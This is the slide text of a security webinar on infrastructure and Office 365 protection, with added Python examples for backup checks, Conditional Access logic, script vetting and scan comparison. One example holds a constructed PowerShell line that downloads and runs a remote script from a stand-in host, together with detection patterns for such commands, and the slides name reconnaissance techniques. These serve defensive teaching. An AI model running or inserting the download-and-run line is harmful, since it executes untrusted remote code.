Post on 12-Oct-2020

System Source Pizza Webinar 10/8 – “Ask The Security Expert: Top 10 Security Must Do’s + YOUR Questions Answered”

Chris Riley, Director, System Source, criley@syssrc.com

Tony Paul Pugliese, Enterprise Consulting Engineer, System Source, tpuglies@SYSSRC.com

Shawn Duffy, CISSP, Senior Security Consultant

Agenda

• Welcome and Intro – Chris Riley

• Shawn’s Top 5 IT Infrastructure Security Must Dos – Shawn Duffy

• Tony’s Top 5 Office 365 & Teams Security Must Dos – Tony Paul Pugliese

• How to pinpoint your security holes (hint…and your next priorities!) using security audits, assessments & vulnerability scans – Shawn Duffy

• Q & A – Chris Riley

We Hope You are Enjoying Your Pizza!!

If you haven’t received your pizza, then contact Mike Jones: mjones@syssrc.com

During the Webinar…

Audio – In presentation mode

Control Panel

View webinar in full screen mode

In Chat – Tell us what you hope to learn today

In Questions - Submit your questions

Evaluation just after webinar finish (takes just 2 min.)

Two returned surveys will receive a $25 Amazon Gift Card (Let’s keep it fun!)

Quick wins in Securing your infrastructure

Shawn Duffy

#1 – Select and use a Security Framework

Available options for micro- to small-businesses:

• COBIT (Control Objectives for Information and Related Technologies)

• NIST 800 series (HIPAA, FISMA, CMMC / CUI)

• NIST CSF

• ISO 27000

• Industry-Specific Standards: GLP, GMP, GLBA, HITRUST, PCI DSS

#2 – Create a Backup Program

• Backups are sometimes all you have

• Automate them, but test

• Backups can be incremental

• Store backups offsite

• Test backups

• Protect backups from unauthorized recovery
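The "automate them, but test" and "protect backups" points above are easier to act on with a concrete restore test. The following is an added example, not material from the webinar: it records a SHA-256 per file when the backup set is taken, seals that manifest with an HMAC key that is assumed to be held apart from the backup media, and checks a trial restore for missing or corrupted files. The file contents, paths and key are constructed for the example.

```python
"""
Added example: restore testing and tamper-evident manifests for a
backup set. Nothing here is from the webinar; file contents and the
signing key are constructed.
"""
import hashlib
import hmac
import json
import os
import tempfile


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def build_manifest(files):
    """files: {relative_path: bytes} -> {relative_path: sha256 hex} (taken at backup time)."""
    return {path: sha256_hex(data) for path, data in sorted(files.items())}


def sign_manifest(manifest, key):
    """HMAC over the canonical JSON form, so a manifest edited alongside the backup is detectable."""
    body = json.dumps(manifest, sort_keys=True).encode("utf-8")
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def manifest_is_authentic(manifest, key, tag):
    return hmac.compare_digest(sign_manifest(manifest, key), tag)


def verify_restore(manifest, restored):
    """Compare a trial restore ({relative_path: bytes}) against the manifest."""
    missing = sorted(p for p in manifest if p not in restored)
    corrupt = sorted(p for p in manifest if p in restored and sha256_hex(restored[p]) != manifest[p])
    extra = sorted(p for p in restored if p not in manifest)
    return {"missing": missing, "corrupt": corrupt, "extra": extra, "ok": not (missing or corrupt)}


def read_tree(root):
    """Load a directory on disk into {relative_path: bytes} for the helpers above."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                files[rel] = fh.read()
    return files


# Constructed backup set and a signing key assumed to live outside the backup store
ORIGINAL = {
    "db/customers.sql": b"CREATE TABLE customers (id INTEGER, name TEXT);\n",
    "docs/policy.txt": b"Backups are restore-tested monthly.\n",
}
SIGNING_KEY = b"example-key-held-outside-the-backup-store"

if __name__ == "__main__":
    manifest = build_manifest(ORIGINAL)
    tag = sign_manifest(manifest, SIGNING_KEY)
    # Simulate a restore into a scratch directory, then check it against the manifest
    with tempfile.TemporaryDirectory() as restore_dir:
        for path, data in ORIGINAL.items():
            full = os.path.join(restore_dir, *path.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
        print("manifest authentic:", manifest_is_authentic(manifest, SIGNING_KEY, tag))
        print("restore check:", verify_restore(manifest, read_tree(restore_dir)))
```

Run the restore check against a real restore target, not the live system, and keep the HMAC key off the backup media: if the key sits next to the manifest, anyone who can rewrite the backup can also re-sign it.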

#3 – Create MFA for remote access

• Biometrics

• Key fobs

• mobile applications

• digital certificates

#4 – Continuous Monitoring

• You don’t know what you don’t know

• Reduce time to react

• Monitor with current OSINT

• You don’t have to commit your time to it

#5 – Test your system often

• Security Assessments keep you aware

• Remediate based on risk levels

• Showing improvements can help with budgeting

• Detect Shadow IT

• Detect unauthorized entry-points

• Hackers are always testing

Top 5 (or so) security Office 365 recommendations

Tony Pugliese

• Protect Identities

• Protect computing resources

• Protect data

Protect Identities

1. Office 365 Azure AD MFA

• (Free) Security Defaults

• Requires all users to register for Azure Multi-Factor Authentication.

• Requires administrators to perform multi-factor authentication.

• Blocks legacy authentication protocols that don’t support Modern Authentication

• Requires users to perform multi-factor authentication when necessary.

• Protects privileged activities like access to the Azure portal.

• The Security Defaults setting enables MFA for all users or none.

• Without Security Defaults, per-user MFA available through Azure portal

Azure AD MFA

• Conditional Access (M365 Business Premium, M365 E3, EMS E3, Azure AD Premium P1)

• Set policies to determine when MFA appropriate.

• Users are prompted for multi-factor authentication only when the policy conditions call for it

• Strike balance between security and user convenience

• Conditions based on Trusted IP ranges, Applications, User groups

Azure AD MFA: Conditional Access

Azure AD MFA

• Risk-based Conditional Access (Azure AD Premium P2)

• Dynamic risk assessments determine when MFA is appropriate.

• Administrator sets the risk level in policy.

• A user risk represents the probability that a given identity or account is compromised.

  • Leaked Credentials – found on the Dark Web or other bad neighborhood

  • Azure AD Threat Intelligence – looks like the account is under attack

• Sign-in Risk represents the probability that a given authentication request isn't authorized by the identity owner.

  • atypical travel

  • impossible travel

  • unfamiliar sign-in properties

  • admin confirmed user account compromised

  • malicious IP

  • malware-linked IP address

  • suspicious inbox manipulation rules

  • password spray
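The two Conditional Access slides above (policy conditions on trusted IP ranges, applications and user groups; risk-based decisions from signals such as impossible travel and password spray) describe a decision that is easy to follow in code. The block below is an added example written for this page, not Microsoft code and not the presenter's: it is a toy evaluator that returns whether a sign-in should be prompted for MFA and why. It computes two of the listed risk signals itself (impossible travel from consecutive sign-in locations, password spray from one source IP failing against many accounts in a short window) and then applies the static conditions. Every policy value, network range, location and sign-in record is constructed; the speed threshold, window and user-count cut-offs are assumptions, not Azure AD's actual tuning.

```python
"""
Added example: a toy Conditional Access evaluator. Not Microsoft code;
all policy values, networks, sign-ins and thresholds are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from math import asin, cos, radians, sin, sqrt

# Constructed policy: assumed office egress range, apps and groups that always need MFA
TRUSTED_NETWORKS = [ip_network("203.0.113.0/24")]
MFA_REQUIRED_APPS = {"Azure portal"}
MFA_REQUIRED_GROUPS = {"Global Administrators"}


@dataclass
class SignIn:
    user: str
    ip: str
    app: str
    when: datetime
    lat: float
    lon: float
    success: bool = True


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def impossible_travel(prev, cur, max_kmh=900.0):
    """True when the implied speed between two sign-ins exceeds an airliner (assumed 900 km/h)."""
    hours = (cur.when - prev.when).total_seconds() / 3600.0
    dist = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
    if hours <= 0:
        return dist > 0
    return dist / hours > max_kmh


def password_spray(history, cur, window=timedelta(minutes=30), min_users=5):
    """True when the current source IP has failed against many distinct accounts recently."""
    start = cur.when - window
    targets = {s.user for s in history
               if s.ip == cur.ip and not s.success and start <= s.when <= cur.when}
    return len(targets) >= min_users


def sign_in_risk(history, cur):
    """Map the computed signals to a coarse level: 'high', 'medium' or 'low'."""
    if password_spray(history, cur):
        return "high"
    prior = [s for s in history if s.user == cur.user and s.success and s.when < cur.when]
    if prior and impossible_travel(max(prior, key=lambda s: s.when), cur):
        return "medium"
    return "low"


def requires_mfa(cur, groups, history):
    """Return (prompt_for_mfa, reason) for one sign-in under the constructed policy."""
    if cur.app in MFA_REQUIRED_APPS:
        return True, "privileged application"
    if groups & MFA_REQUIRED_GROUPS:
        return True, "privileged group"
    risk = sign_in_risk(history, cur)
    if risk != "low":
        return True, f"sign-in risk: {risk}"
    if any(ip_address(cur.ip) in net for net in TRUSTED_NETWORKS):
        return False, "trusted network, low risk"
    return True, "untrusted network"


# Constructed sign-in history: one normal office sign-in, then six failures
# from a single outside IP against six different accounts (a spray).
T0 = datetime(2020, 10, 8, 9, 0)
BALTIMORE = (39.29, -76.61)
LONDON = (51.51, -0.13)
HISTORY = [SignIn("alice", "203.0.113.10", "Teams", T0, *BALTIMORE)] + [
    SignIn(f"user{i}", "198.51.100.7", "Outlook", T0 + timedelta(minutes=i), *LONDON, success=False)
    for i in range(6)
]

if __name__ == "__main__":
    cases = [
        ("alice from the office", SignIn("alice", "203.0.113.10", "Teams", T0 + timedelta(hours=1), *BALTIMORE), set()),
        ("alice in London an hour later", SignIn("alice", "198.51.100.50", "Teams", T0 + timedelta(hours=1), *LONDON), set()),
        ("bob from the spraying IP", SignIn("bob", "198.51.100.7", "Outlook", T0 + timedelta(minutes=10), *LONDON), set()),
        ("carol, a Global Administrator", SignIn("carol", "203.0.113.20", "Teams", T0, *BALTIMORE), {"Global Administrators"}),
    ]
    for label, attempt, groups in cases:
        print(f"{label}: {requires_mfa(attempt, groups, HISTORY)}")
```

The ordering in requires_mfa is the part worth copying: privileged apps and groups are prompted unconditionally, risk is checked before the trusted-network exemption so a compromised credential used from the office still triggers MFA, and the network exemption is the last thing consulted.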

Protect Computing Resources

2. MFA for on-premises resources from outside

Synced accounts between AD and Office 365?

Your network and Azure AD are each providing vectors for hacking against the other.

ANY service using AD credentials that is externally available should be MFA protected:

• Exchange Web Access / admin portal

• VPN access

• Remote Desktop Services / Terminal Server / Citrix Server

• Publicly available SharePoint, Wiki or Intranet portal sites

• timesheet entry / HR portal

3. Use a dedicated admin account

Use it ONLY for administrative tasks

Always use it with MFA when outside your network

Never choose option to save passwords in browser sessions

Use different accounts and / or passwords for each of your admin accounts

Log out of the admin account when done.

Protect Your Data

4. Configure Consistent Security for Office 365 / Azure services

Microsoft Teams is a front-end interface that hooks into these back-end services:

• SharePoint

• OneDrive

• Azure Groups

• Exchange

• (and some others)

Security settings from each of these components interact and can conflict:

• Guest / external (federated) Teams members

• External SharePoint and OneDrive Access

MAKE SURE YOU UNDERSTAND HOW THEY FIT TOGETHER!

5. Use tools you can trust

Automation is good only if you can trust what’s being done.

For downloaded scripted tools, verify code

• Only download and run scripted code when you can see the source.

• Especially if running as an administrator!

If you can’t see the source, find another way...

• hire a coder to assist with <insert automation / scripting language here>

• Roll your own scripts tailored to your workflow and requirements.

• Use pre-built, packaged, commercial 3rd party tools
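As a concrete form of "only run scripted code when you can see the source", the block below is an added example, not from the webinar or from any Microsoft tooling. It does two things: opaque_constructs() flags the constructs that mean you cannot actually read what will execute (encoded commands, dynamic evaluation, download-and-run, large base64 blobs), and pin_after_review() records a SHA-256 for a script only after a person has read it and it contains none of those, so that may_run() later refuses anything unreviewed or changed since review. The heuristic patterns are assumptions, not an exhaustive list, and the sample scripts are constructed.

```python
"""
Added example: a review-and-pin gate for downloaded admin scripts.
Not from the webinar; patterns are heuristics and the scripts are constructed.
"""
import hashlib
import re

# Heuristics for "source you cannot see" in PowerShell and shell tooling (assumed, not exhaustive)
OPAQUE_PATTERNS = [
    (re.compile(r"-EncodedCommand\b|-enc\b", re.I), "encoded PowerShell command"),
    (re.compile(r"Invoke-Expression|\biex\b", re.I), "dynamic code evaluation"),
    (re.compile(r"DownloadString|curl\s[^\n]*\|\s*(?:sh|bash)\b", re.I), "remote download"),
    (re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"), "large base64 blob"),
]


def opaque_constructs(script_text):
    """Return the label of every opaque construct found, in pattern order."""
    return [label for pattern, label in OPAQUE_PATTERNS if pattern.search(script_text)]


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def pin_after_review(pins, name, script_text):
    """Record the digest of a script a human has just read end to end.

    Returns the digest, or None (and pins nothing) if the script contains
    constructs whose effect cannot be read from the source."""
    if opaque_constructs(script_text):
        return None
    pins[name] = sha256_hex(script_text)
    return pins[name]


def may_run(pins, name, script_text):
    """(allowed, reason): run only a byte-identical copy of a reviewed script."""
    if name not in pins:
        return False, "not reviewed"
    if sha256_hex(script_text) != pins[name]:
        return False, "content changed since review"
    return True, "matches reviewed copy"


# Constructed sample: a readable reporting script, then the same file with a
# download-and-evaluate line appended (the kind of change the pin catches).
REVIEWED = (
    "param([string]$User)\n"
    "Get-MsolUser -UserPrincipalName $User | Select-Object DisplayName, StrongAuthenticationMethods\n"
)
TAMPERED = REVIEWED + "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/helper.ps1')\n"

if __name__ == "__main__":
    pins = {}
    print("pinned:", pin_after_review(pins, "mfa-report.ps1", REVIEWED))
    print("original:", may_run(pins, "mfa-report.ps1", REVIEWED))
    print("tampered:", may_run(pins, "mfa-report.ps1", TAMPERED))
    print("tampered constructs:", opaque_constructs(TAMPERED))
    print("pin tampered directly:", pin_after_review({}, "x.ps1", TAMPERED))
```

The pin store is only as trustworthy as the place it lives; keep it where the account that runs scripts cannot edit it, otherwise "reviewed" becomes whatever the last writer said it was.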

6. Train your users

More than 90% of cyberattacks and resulting data breaches start with a phishing campaign

• Users are often the weak link in security

Weak or stolen user credentials are used in 95% of all web application attacks.

• Password theft is constantly evolving as hackers employ methods like keylogging, phishing, and pharming. Passwords are NOT security anymore!

6. Train your users

More credentials are lost through phishing than any other method

Set up automated and repetitive phishing campaigns to:

• Train and test your users

• increase awareness

• Help them spot phony links to web sites

• Make them more resistant to phishing attacks

How to pinpoint your security holes

Shawn Duffy

Audit v. Assessment

➢ Audit

Two types: internal and external audits. A security audit is an examination of results to verify a system against specifications, standards, processes, etc., generally carried out on the basis of checklists.

➢ Assessment

Two types: internal and external assessments. A security assessment is an evaluation of the security robustness of the system. The assessor’s experience is valuable for interpretation of the evaluation.

Threat v. Vulnerability v. Risk

➢ Threat (always present)

Anything that could potentially harm the system, data or infrastructure. Threats can be physical or environmental, or come from human error or intent.

➢ Vulnerability (needs to be acted on)

A weakness or error found within a system that has the potential to be leveraged by a threat agent in order to compromise the system.

➢ Risk (the likelihood a vulnerability will be acted on)

The impact to an organization and the likelihood of a vulnerability being exploited through a threat, whether caused by a human or the environment.

Effective Audits

• Determine the Checklist

• Assess Security controls and enforcements

• Reporting:

✓ Summary of Findings

✓ Prioritize (Risk Scoring)

✓ Formulate Security Solutions (POA)

Effective Assessment

• SME Assessor

• Strong set of tools (Commercial and Open-Source)

• Recon, Passive Information Gathering

• Active Information Gathering

• Reporting:

✓ Summary of Findings

✓ Prioritize (Risk Scoring)

✓ Formulate Security Solutions (POA)

Passive Information

• Social Media

• Business | Financial Reports

• Netcraft

• Email Harvesting

• Online News

• Recent Hacks

• DNS brute-forcing

• Google Dorking

Active Information

• Nmap – the network Swiss army-knife

• Port & Service Probes (TCP & UDP)

• Firewall Responses (firewalking)

• Access Limitations – MFA, Session Lockouts

• Scanning Tools – Nessus, Qualys, CrowdStrike

• Web Application Testing | Fuzzing

• NetBIOS & SMB | Samba Responses

• SNMP community strings
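The active-information list above is what an assessor gathers; the defender's side of the same data is comparing what a scan actually found against what is supposed to be exposed, which is how the earlier "detect unauthorized entry-points" and "detect Shadow IT" goals are met. The block below is an added example, not from the webinar and not Nmap's own code: it parses Nmap's greppable (-oG) output format, keeps only open ports, and reports every host/port pair that is absent from an allowlist of expected exposure. The scan output and the allowlist are constructed; the hosts use documentation address space and do not refer to any real system.

```python
"""
Added example: compare an Nmap -oG scan against an exposure allowlist.
Not Nmap's code; the scan text and allowlist are constructed.
"""

# Constructed greppable output in Nmap's -oG layout: tab-separated fields, each port
# entry is port/state/protocol/owner/service/rpc-info/version/
SAMPLE_GNMAP = (
    "# Nmap scan initiated (constructed sample)\n"
    "Host: 192.0.2.10 (mail.example.test)\tStatus: Up\n"
    "Host: 192.0.2.10 (mail.example.test)\tPorts: 25/open/tcp//smtp//Postfix smtpd/, "
    "443/open/tcp//https//nginx/, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/, "
    "8080/filtered/tcp//http-proxy///\tIgnored State: closed (996)\n"
    "Host: 192.0.2.11 ()\tPorts: 161/open/udp//snmp//SNMPv1 server (public)/\tIgnored State: closed (999)\n"
)

# Constructed allowlist: the only (port, protocol) pairs that are supposed to be reachable per host.
# A host missing from the allowlist should expose nothing at all.
EXPECTED_EXPOSURE = {
    "192.0.2.10": {(25, "tcp"), (443, "tcp")},
}


def parse_gnmap(text):
    """Return {host_ip: {(port, protocol, service), ...}} for open ports only."""
    observed = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        host = fields[0].split()[1]
        ports_field = next((f for f in fields if f.startswith("Ports:")), None)
        if ports_field is None:
            continue  # the "Status: Up" line carries no ports
        for entry in ports_field[len("Ports:"):].split(","):
            parts = entry.strip().split("/")
            if len(parts) < 5 or parts[1] != "open":
                continue
            observed.setdefault(host, set()).add((int(parts[0]), parts[2], parts[4]))
    return observed


def unexpected_exposure(observed, expected):
    """List (host, port, protocol, service) for every open port not in the allowlist."""
    findings = []
    for host, ports in observed.items():
        allowed = expected.get(host, set())
        for port, proto, service in ports:
            if (port, proto) not in allowed:
                findings.append((host, port, proto, service))
    return sorted(findings)


if __name__ == "__main__":
    for host, port, proto, service in unexpected_exposure(parse_gnmap(SAMPLE_GNMAP), EXPECTED_EXPOSURE):
        print(f"{host} exposes {port}/{proto} ({service}) but is not allowlisted for it")
```

Feed it the -oG file from a scan you are authorized to run against your own perimeter, and review the allowlist as carefully as the findings: an allowlist that quietly grows to match each scan defeats the purpose.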

Q & A

Kindly complete the survey at the end of this webinar. We will use your feedback to help us improve.

Fun Reminder… Two returned surveys will receive $25 Amazon Gift Cards

THANK YOU!